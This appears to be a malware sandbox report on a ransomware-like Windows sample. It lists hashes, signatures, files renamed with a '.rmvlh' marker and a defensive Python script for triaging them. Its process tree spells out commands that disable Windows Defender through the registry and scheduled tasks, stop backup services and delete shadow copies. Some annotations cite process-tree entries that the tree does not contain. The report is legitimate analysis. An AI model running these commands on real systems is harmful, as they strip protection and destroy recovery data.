Analysis
max time kernel: 121s
max time network: 121s
platform: windows7_x64
resource: win7-en-20211208
submitted: 13-01-2022 13:29

Static task: static1
Behavioral task: behavioral1
  Sample: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
  Resource: win10-en-20211208
General
Target: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
Size: 2.6MB
MD5: 6a998dc6f975da2f4e88849b03b34b13
SHA1: 56f7fea05977ed3a4b1b6fed4713a56008669e4b
SHA256: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050
SHA512: 8c4ade656335d3f9ca575bfb615f8cb36107bf5cbd5c47070e97a2818953062619d06dd03a911d5f4e176709273580e1d2370da6ff5cdb555ac42e1ed09a468b
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses the MpCmdRun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 1656)
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" (4 = SERVICE_DISABLED, so the Defender service will not start on the next boot)
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 556), bcdedit.exe (PID 616)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe (PID 964). Every entry below is "File opened for modification" by that process. Entries ending in "...h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_<12 chars>.rmvlh" are files the sample has already renamed (the segment before the final 12 characters is identical across all of them); the remaining entries appear under their original names.
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_q8naHqLas7k0.rmvlh
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_fBAKzovnsMc0.rmvlh
  C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_tBgdxKYvZEs0.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostName.XSL.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_O3Zq2CDkm-M0.rmvlh
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_32nebOUrjb40.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.DPV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_Dmy7tNSWpx00.rmvlh
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\library.js
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_NMsrl_Powi00.rmvlh
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html
  C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\PUSH.WAV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_gntmRNGXg-E0.rmvlh
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png
  C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_g7jrEEhBoTY0.rmvlh
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_XNQIUHn9Q8w0.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_hUqN8yxxYhI0.rmvlh
  C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png
  C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ARFR\MSB1ARFR.ITS.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_lXVbhvT6vSo0.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_OFF.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_6WiCfMVwoL80.rmvlh
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10299_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_E-uhKTAXjBc0.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_ZtfLuxpM_XE0.rmvlh
  C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_GG3mSPak3s80.rmvlh
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_Qzx-fxquskA0.rmvlh
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_eX_uxGJFv140.rmvlh
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_XMiiT1NLyTU0.rmvlh
  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_MyeNg9QChRg0.rmvlh
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_LhnPkkALBf80.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOT.WAV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_5PVqa109Xp00.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL111.XML.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_na7NyQQ5jdc0.rmvlh
  C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui
  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png
  C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\bckgzm.exe.mui.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_2HXho5P3Gl80.rmvlh
  C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_MVcAMbeE5DQ0.rmvlh
  C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_a6fwT4Kt7IM0.rmvlh
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_acye6FqJznI0.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_YN-fGXEFsWQ0.rmvlh
  C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_ocQJUK7c0n40.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Generic.gif.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_bhBwqbaa8bc0.rmvlh
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_vXB9HTNA8m40.rmvlh
  C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_0c3y7VMLSkU0.rmvlh
  C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_bkVO1BQVLrQ0.rmvlh
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15134_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_pUrJmlMFCN40.rmvlh
  C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_gmV0juBTptc0.rmvlh
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_eMQb2y2Hopo0.rmvlh
  C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\settings.html
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_2Rw-2MPJofs0.rmvlh
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18206_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_stjNgnZoEX00.rmvlh
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_f5OvBs_qv3M0.rmvlh
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_jKmBN4eI06M0.rmvlh
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_l79V25HqI8Y0.rmvlh
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT
  C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\rtscom.dll.mui
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_C-ixsYGeRAo0.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_ON.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH__lgWEmOmrNs0.rmvlh
  C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html
  C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_23BAO480mQA0.rmvlh
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\gadget.xml
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_-V3hhvSTVu80.rmvlh
  C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Adobe.css.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_IOwcWBH1I_c0.rmvlh
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_5HG9nCJhnpo0.rmvlh
- Launches sc.exe
  sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1960)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 1840), powershell.exe (PID 2096), edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe (PID 964)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: wevtutil.exe (PIDs 1480, 1908, 1408), wmic.exe (PIDs 276, 1660)
  Privileges enabled, grouped by process (the report records one entry per enabled privilege and stops at its 64-IoC cap):
  wevtutil.exe (PID 1480): SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe (PID 1908): SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe (PID 1408): SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe (PID 276): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  wmic.exe (PID 1660): the same 20 privileges as PID 276
  wmic.exe (PID 1660), recorded a second time: SeIncreaseQuotaPrivilege through SeManageVolumePrivilege and 33 (18 entries; the list ends here at the 64-IoC cap)
  The numeric entries are privilege LUIDs the sandbox did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege.
  SeSecurityPrivilege on wevtutil.exe is the privilege required to clear the Security log ("wevtutil cl security" in the process tree). wmic.exe enables every privilege present in its token when it starts, so the long wmic.exe list reflects the tool, not the shadowcopy commands it was given.
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe (PID 964), net.exe (PIDs 1884, 1312, 1832, 1272, 864, 1972, 1356, 1616)
  Each parent/child pair is recorded three times in the report. All of the targets are processes the writer itself spawned (see the process tree), which is the ordinary pattern of process creation rather than injection into an unrelated process.
  PID 964 (edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe) wrote to memory of net.exe PIDs 1884, 1312, 1832, 1272, 864, 1972, 1356, 1616 and sc.exe PIDs 1640, 968, 1472, 1736, 1056, 1216
  PID 1884 (net.exe) wrote to memory of 460 (net1.exe)
  PID 1312 (net.exe) wrote to memory of 1256 (net1.exe)
  PID 1832 (net.exe) wrote to memory of 1348 (net1.exe)
  PID 1272 (net.exe) wrote to memory of 1820 (net1.exe)
  PID 864 (net.exe) wrote to memory of 1976 (net1.exe)
  PID 1972 (net.exe) wrote to memory of 1960 (net1.exe)
  PID 1356 (net.exe) wrote to memory of 1552 (net1.exe)
  PID 1616 (net.exe) wrote to memory of 744 (net1.exe)
  The list ends at the 64-IoC cap after the first of the writes to sc.exe PID 1216.
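Every renamed file in the "Drops file in Program Files directory" list follows one pattern: the original name, a dot, a segment that is identical across all 64 entries, a 12-character segment that differs per file, and the ".rmvlh" extension. The following Python is an added example, not part of the sandbox report: it parses that pattern, recovers the original file name, and separates renamed files from files that were opened but still carry their original names. The split into a "constant" and a "per-file" segment is an observation from this list only (the report does not say what either segment encodes), and the regex, function names and the SAMPLE_PATHS list (copied from the IoC list above) are mine.

```python
"""Parse the file-name marker this sample appends to the files it renames.

Added example; not part of the sandbox report. Observed in the IoC list:
<original name> + "." + a segment shared by all 64 entries + a 12-character
segment that differs per file + ".rmvlh". The report does not state what the
two segments encode, so "constant" and "per-file" describe the observation,
not a decoded format.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

CONSTANT_SEGMENT = "h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_"
EXTENSION = ".rmvlh"

# Anchored at both ends so the marker must be the tail of the file name; the
# per-file segment uses the URL-safe base64 alphabet seen in the report.
_MARKER = re.compile(
    r"^(?P<original>.+)\."
    + re.escape(CONSTANT_SEGMENT)
    + r"(?P<per_file>[A-Za-z0-9_-]{12})"
    + re.escape(EXTENSION)
    + r"$"
)


class EncryptedName(NamedTuple):
    original: str   # file name before the marker was appended
    per_file: str   # the 12-character segment that varies per file


def parse_encrypted_name(name: str) -> Optional[EncryptedName]:
    """Return the parsed marker for a bare file name, or None if absent."""
    m = _MARKER.match(name)
    if m is None:
        return None
    return EncryptedName(m.group("original"), m.group("per_file"))


def triage_paths(paths: List[str]) -> Tuple[Dict[str, str], List[str]]:
    """Split full Windows paths into renamed (encrypted path -> original
    path) and untouched (opened for modification, still under the original
    name). Only the last path component is inspected."""
    renamed: Dict[str, str] = {}
    untouched: List[str] = []
    for path in paths:
        directory, _, filename = path.rpartition("\\")
        parsed = parse_encrypted_name(filename)
        if parsed is None:
            untouched.append(path)
        else:
            prefix = directory + "\\" if directory else ""
            renamed[path] = prefix + parsed.original
    return renamed, untouched


# Copied from the "Drops file in Program Files directory" IoC list above.
SAMPLE_PATHS = [
    r"C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_q8naHqLas7k0.rmvlh",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_fBAKzovnsMc0.rmvlh",
    r"C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui",
    r"C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_ON.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH__lgWEmOmrNs0.rmvlh",
    r"C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\library.js",
]

if __name__ == "__main__":
    renamed, untouched = triage_paths(SAMPLE_PATHS)
    for encrypted, original in renamed.items():
        segment = parse_encrypted_name(encrypted.rpartition("\\")[2]).per_file
        print(f"renamed   per_file={segment}  {original}")
    for path in untouched:
        print(f"untouched {path}")
```

Pointing triage_paths at a full file listing of an affected volume gives the set of original names to restore from backup and, because the constant segment is the same for every file in this run, a single string to search for across other hosts. Note that a name such as "Athens" (a Java time-zone data file) has no extension of its own, so any recovery logic must not assume the original name contains a dot.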
Processes
Tree depth is the leading number (1 = the submitted sample, 2 = spawned by it, 3 = grandchild); "cmd:" is the recorded command line and the indented "-" lines are the signatures each process triggered.

1  PID 964   C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
   cmd: "C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"
   - Drops file in Program Files directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory
  2  PID 1884  C:\Windows\system32\net.exe
     cmd: net.exe stop "NetMsmqActivator" /y
     - Suspicious use of WriteProcessMemory
    3  PID 460   C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  2  PID 1312  C:\Windows\system32\net.exe
     cmd: net.exe stop "SamSs" /y
     - Suspicious use of WriteProcessMemory
    3  PID 1256  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "SamSs" /y
  2  PID 1832  C:\Windows\system32\net.exe
     cmd: net.exe stop "SDRSVC" /y
     - Suspicious use of WriteProcessMemory
    3  PID 1348  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  2  PID 1272  C:\Windows\system32\net.exe
     cmd: net.exe stop "SstpSvc" /y
     - Suspicious use of WriteProcessMemory
    3  PID 1820  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  2  PID 864   C:\Windows\system32\net.exe
     cmd: net.exe stop "UI0Detect" /y
     - Suspicious use of WriteProcessMemory
    3  PID 1976  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  2  PID 1972  C:\Windows\system32\net.exe
     cmd: net.exe stop "VSS" /y
     - Suspicious use of WriteProcessMemory
    3  PID 1960  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "VSS" /y
  2  PID 1356  C:\Windows\system32\net.exe
     cmd: net.exe stop "wbengine" /y
     - Suspicious use of WriteProcessMemory
    3  PID 1552  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "wbengine" /y
  2  PID 1616  C:\Windows\system32\net.exe
     cmd: net.exe stop "WebClient" /y
     - Suspicious use of WriteProcessMemory
    3  PID 744   C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "WebClient" /y
  2  PID 1640  C:\Windows\system32\sc.exe
     cmd: sc.exe config "NetMsmqActivator" start= disabled
  2  PID 968   C:\Windows\system32\sc.exe
     cmd: sc.exe config "SamSs" start= disabled
  2  PID 1472  C:\Windows\system32\sc.exe
     cmd: sc.exe config "SDRSVC" start= disabled
  2  PID 1736  C:\Windows\system32\sc.exe
     cmd: sc.exe config "SstpSvc" start= disabled
  2  PID 1056  C:\Windows\system32\sc.exe
     cmd: sc.exe config "UI0Detect" start= disabled
  2  PID 1216  C:\Windows\system32\sc.exe
     cmd: sc.exe config "VSS" start= disabled
  2  PID 1672  C:\Windows\system32\sc.exe
     cmd: sc.exe config "wbengine" start= disabled
  2  PID 904   C:\Windows\system32\sc.exe
     cmd: sc.exe config "WebClient" start= disabled
  2  PID 1704  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2  PID 1596  C:\Windows\system32\reg.exe
     cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2  PID 1644  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2  PID 460   C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2  PID 1320  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2  PID 1688  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2  PID 1132  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2  PID 392   C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2  PID 432   C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2  PID 1944  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2  PID 1488  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2  PID 2040  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2  PID 1164  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2  PID 1724  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2  PID 760   C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2  PID 816   C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2  PID 1328  C:\Windows\system32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2  PID 1904  C:\Windows\system32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2  PID 1404  C:\Windows\system32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2  PID 664   C:\Windows\system32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2  PID 1676  C:\Windows\system32\schtasks.exe
     cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2  PID 1140  C:\Windows\system32\reg.exe
     cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2  PID 1976  C:\Windows\system32\reg.exe
     cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2  PID 1032  C:\Windows\system32\reg.exe
     cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2  PID 1636  C:\Windows\system32\reg.exe
     cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2  PID 1612  C:\Windows\system32\reg.exe
     cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2  PID 1580  C:\Windows\system32\reg.exe
     cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2  PID 568   C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2  PID 1768  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2  PID 1712  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2  PID 1604  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2  PID 516   C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
     - Modifies security service
  2  PID 1812  C:\Windows\system32\reg.exe
     cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2  PID 1960  C:\Windows\system32\vssadmin.exe
     cmd: vssadmin.exe delete shadows /all /quiet
     - Interacts with shadow copies
